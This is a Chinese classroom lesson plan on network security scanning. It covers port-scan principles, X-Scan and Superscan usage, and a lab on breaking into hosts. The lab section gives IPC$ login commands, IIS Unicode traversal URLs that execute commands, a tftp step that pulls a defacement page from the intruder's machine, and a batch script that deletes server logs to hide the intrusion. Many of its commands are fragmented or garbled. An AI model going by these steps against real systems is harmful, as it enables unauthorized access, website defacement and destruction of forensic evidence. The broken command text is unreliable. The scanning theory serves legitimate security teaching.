网络安全扫描器与漏洞的入侵扫描.docx
- 文档编号:1768823
- 上传时间:2023-05-01
- 格式:DOCX
- 页数:12
- 大小:434.58KB
网络安全扫描器与漏洞的入侵扫描.docx
《网络安全扫描器与漏洞的入侵扫描.docx》由会员分享,可在线阅读,更多相关《网络安全扫描器与漏洞的入侵扫描.docx(12页珍藏版)》请在冰点文库上搜索。
网络安全扫描器与漏洞的入侵扫描
单元三网络系统的安全配置与管理
项目五 网络安全扫描器及漏洞的入侵扫描
教学目标
1.了解安全扫描的的原理、作用和网络扫描工具X-scan、Superscan的主要原理;
2.熟练掌握X-Scan、Superscan扫描器的利用,实现屏幕监视和控制和远程执行命令;
3.掌握主机入侵方式及基于Unicode漏洞的入侵,提高运算机安全方面的安全隐患意识。
教学要求
1.认真听讲,专心操作,操作规范,认真记录实验进程,总结操作经验和写好实验报告,在实验中培育严谨科学的实践操作适应;
2.遵守学校的实验室纪律,注意人身和设备的安全操作,珍惜实验设备、及时上缴作业;
3.教学环境:
Windows7和Windowsserver2003/2008以上操作系统。
知识要点
1.了解安全扫描的的原理、作用;
2.理解网络扫描工具X-scan、Superscan的主要原理。
;
技术要点
1.熟练掌握X-Scan、Superscan扫描器的利用,实现屏幕监视和控制和远程执行命令。
2.掌握主机入侵方式及基于Unicode漏洞的入侵,提高运算机安全方面的安全隐患意识。
技术训练
一.讲授与示范
正确启动运算机,在最后一个磁盘上成立以学号为名的文件夹,从指定的共享文件夹中将“实习指导书”和其他内容复制到该文件夹中。
(一)安全扫描的原理
1.作用
1)自动检测远程或本地主机安全脆弱点的程序;
2)采用模拟解决的形式对目标可能存在的已知安全漏洞进行逐项检查;
3)并非是一个直接的解决网络漏洞的程序;
2.功能
发觉一个主机和网络的能力;一旦发觉一台主机,有发觉什么服务正运行在这台主机上的能力;通过测试这些服务,发觉这些漏洞的能力。
(二)端口扫描
扫描器主要可分为基于主机的和基于网络的两种。
真正的扫描器是TCP端口扫描器,能够连通TCP/IP端口和服务(比如,Telnet或FTP),并记录目标的回答,搜集到关于目标主机的有效信息。
1.TCPSYN扫描
原理:
扫描程序发送的SYN数据包,预备打开一个新的连接并等待反映:
一个SYN|ACK的返回信息表示端口处于侦听状态,一个RST返回表示端口没有处于侦听状态。
长处:
不会在目标运算机上留下纪录。
缺点:
扫描程序必需要有root权限才能成立自己的SYN数据包。
2.TCPconnect()扫描
原理:
利用操作系统提供connect()系统挪用,与每一个感兴趣的目标运算机的端口进行连接,若端口处于侦听状态,那么connect()就可以成功。
长处:
系统中的任何用户都有权利利用那个挪用;
缺点:
很容易被发觉,目标运算机的logs文件会显示连续串联接和连接犯错的消息,而且专门快将它关闭。
3.TCPFIN扫描
原理:
利用关闭的端口会用适当的RST来回答FIN数据包,而打开的端口会忽略对FIN数据包的回答。
长处:
FIN数据包能够不惹任何麻烦的通过。
缺点:
这种方式和系统的实现有必然的关系,有些系统不论是打开的或关闭的端口对FIN数据包都要给以回答,这种情形下该方式就不实用了。
(三)扫描工具的应用
1.利用X-SCAN扫描局域网主机
1)原理
X-Scan采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能。
扫描运算机的端口、漏洞、某种服务、某个协议、系统密码,包括:
远程服务类型、操作系统类型及版本,各类弱口令漏洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等20多个大类。
对于多数已知漏洞,给出了相应的漏洞描述、解决方案及详细描述链接。
通过扫描结果,能够了解的看到系统哪方面可能出现风险,比如密码太弱或黑客可利用的漏洞等,以便即便采取办法对运算机系统进行加固。
2)X-Scan的利用
任务1 系统弱口令扫描
要求:
利用X-Scan实现主机系统的是不是存在NT弱口令(获取管理权限)
步骤:
1系统安装及设置
下载X-Scan,并解压,运行,而且设置扫描地址
“设置”→“扫描参数”→指定IP范围:
。
如图1所示:
2设置NT-Server弱口令
全局设置→扫描模块→选择NT-Server等弱口令,如图2所示。
图1
图2
3并发扫描及扫描报告的设置
选择“并发扫描”,能够设置要扫描的最大并发主机数,和最大的并发线程数。
图3
图4
选择‘扫描报告’,点击后会显示在右边的窗格中,它会生成一个检测IP或域名的报告文件,同时报告的文件类型能够有3种选择,别离是HTML、TXT、XML。
4其他设置及端口设置
有2种条件扫描:
1,‘跳过没有响应的主机’,2,‘无条件扫描’,如图5。
设置没有响应的主机:
全局设置→其他设置→选中“跳过没有响应的主机”及其他相关;
端口检测:
插件设置→端口相关设置 → 待检测端口7,9,13,19,21,22,,20...→检测方式:
SYN
图5
图6
‘端口相关设置’中能够自概念一些需要检测的端口。
检测方式“TCP”、“SYN”两种,TCP方式容易被对方发觉,准确性要高一些,SYN则相反。
如图6所示。
5SNMP相关设置
用来针对SNMP信息的一些检测设置,在监测主机数量不多的时候能够全选,如图7所示;
6NETBIOS相关设置
WINDOWS系统的NETBIOS信息的检测设置,包括的项目有很多种,按照实际需要进行选择,如图8。
图7
图8
7字典文件设置
是X-SCAN自带的一些用于破解远程账号所用的字典文件,这些字典都是简单或系统默许的账号等。
图9
8开始扫描
图10
9扫描进程及扫描结果
扫描结束以后会自动弹出检测报告,包括漏洞的风险级别和详细的信息,以便咱们对对方主机进行详细的分析。
图11
图11
生成扫描报告如图11所示。
不同运算机扫描结果的报告存在不同。
2.superscan工具
1)功能
主要功能:
检测必然范围内目标主机是不是在线和端口开放情形,检测目标主机提供的各类服务,通过Ping命令查验IP是不是在线,进行IP与域名的转换等。
◆通过Ping来查验IP是不是在线;
◆IP和域名彼此转换;
◆查验目标运算机提供的服务类别;
◆查验必然范围目标运算机的是不是在线和端口情形;
◆工具自概念列表查验目标运算机是不是在线和端口情形;
◆自概念要查验的端口,并能够保留为端口列表文件;
◆软件自带一个木马端口列表,通过那个列表咱们能够检测目标运算机是不是有木马;同时,也能够自己概念修改那个木马端口列表。
2)Superscan应用实例
任务2Superscan应用
要求:
运用Superscan选项的设置实现扫描目标主机的各类信息
步骤:
①Superscan是无需安装,下在解压后能够直接利用。
Superscan12的运行界面如下图所示。
图12Supersca运行界面
②在“开始IP”和“结束IP”:
目标主机IP段,按“开始”:
进行IP扫描,如下图13所示。
图13IP段扫描实例
③选择“主机和服务扫描设置”可对目标主机信息反馈方式、TUP及UDP端口进行设置。
如图14所示。
图14主机和服务扫描设置窗口
④选择“工具”菜单命令,在“主机名/IP/URL”中输入目标主机的主机名、IP地址或域名,然后选择“查找主机名/IP”、“Ping”等图标按钮,能够获取目标主机的各类信息了。
如下图所示。
图15查找主机IP、Ping目标主机等
⑤选择“Windows列举”菜单命令,在“主机名/IP/URL”中输入目标主机的主机名、IP地址或域名,然后选择需要列举的类型,按“Enumerate”按钮,能够获取目标主机的各类列举信息。
如图16所示。
图16对目标主机各类信息进行列举
二.课堂任务实践
任务3 主机入侵方式
要求:
多种方式实现对主机的入侵防范
步骤:
1)IPC$连接的成立与断开
可运用空连接远程目标主机的条件是获到目标主机管理员帐号和密码,同时关闭杀毒软件或防火墙。
①DOS命令窗口
前提:
帐号是admin,密码是123456
netuse\\"123456"/user:
"admin"
2f1c2f%c0%2f../windows/system32/?
/c+dir
+c:
\inetpub\wwwroot
目标IP/scripts/..%c1%1c../winnt/system32/?
/c+dir+c:
\inetpub\wwwroot
主页名:
,,,等
◆工具检测:
X-Scan检测该漏洞,通过扫描取得
/script/..%c1%1c../winnt/system32/?
/c+dir
2)上传自制主页
下载Tftpd32工具,运行tftpd32服务器,只需将自制页面复制到tftpd服务器的路径下即可:
格式:
Tftp[-i]host[GET\PUT]soures[destination]
参数:
-i二进制文件传输;host是Tftp服务器地址;get指下载文件;put指上传文件;Source指文件名;Destination指目的地。
例:
目标ip地址/scripts/..%c0%2f../windows/system32/?
/c
+tftp+本机ip+get++c:
\inetpub\wwwroot\。
3)从头登录远程主机的网站,即为主页的内容
4.清除入侵信息
入侵者在利用unicode漏洞入侵后,在离开远程服务器前,需要清除服务器的日记文件。
BAT文件:
del+C:
\winnt\system32\logfiles\*.*
del+C:
\winnt\system32\config\*.evt
del+C:
\winnt\system32\dtclog\*.*
del+C:
\winnt\system32\*.log
del+C:
\winnt\system32\*.txt
del+C:
\winnt\*.txt
del+C:
\winnt\*.log
操作:
通过TFTP服务器把BAT文件上传至该服务器C:
\下,再通过unicode漏洞执行该BAT文件。
可是,由于通过unicode漏洞取得的权限很低,对绝大多数服务器,入侵者无法通过该漏洞对system32目录访问。
任务5 远程控制
要求:
运用DamWare实现远程控制运算机
步骤:
见附件“项目35 任务5远程控制”。
三.课堂小结
1.本课的纪律评价。
2.实习操作情形分析及出现的常常利用操作强调。
3.提出要求:
要踊跃参与,仔细理解,增加主动性,才能有所收获。
四.作业
要求:
通过上网方式了解网络监听工具Wireshark和Nmap扫描工具的主要功能并能正确利用。
检查:
下次课对本次课的内容进行评价或提问,效果好的在期末成绩上直接2-3分
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 网络安全 扫描器 漏洞 入侵 扫描